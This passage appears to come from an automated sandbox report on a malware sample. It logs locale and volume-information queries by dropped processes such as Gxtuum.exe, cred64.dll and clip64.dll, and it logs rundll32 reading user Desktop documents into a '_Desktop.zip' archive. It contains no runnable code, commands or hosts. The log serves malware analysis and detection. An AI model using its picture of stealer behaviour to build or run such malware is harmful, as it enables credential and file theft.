Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: GetLocaleInfoW,	18_2_006C8DCE
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: GetLocaleInfoW,	18_2_006D2DA8
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	18_2_006D2E77
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	19_2_007E2516
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	19_2_007E27B8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	19_2_007E2803
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	19_2_007D88AC
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	19_2_007E289E
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	19_2_007E2929
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	19_2_007E2B7C
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	19_2_007E2CA2
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	19_2_007D8DCE
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	19_2_007E2DA8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	19_2_007E2E77
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	20_2_007E2516
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	20_2_007E2711
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	20_2_007E27B8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	20_2_007E2803
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	20_2_007D88AC
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: EnumSystemLocalesW,	20_2_007E289E
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	20_2_007E2929
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	20_2_007E2B7C
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	20_2_007E2CA2
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	20_2_007D8DCE
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetLocaleInfoW,	20_2_007E2DA8
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	20_2_007E2E77

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-console-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-debug-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\Desktop\AQRFEVRTGL VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\Documents\EFOYFBOLXA VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\Pictures VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Queries volume information: C:\Users\user\Videos VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000820101\update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000820101\update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000830101\update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000830101\update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
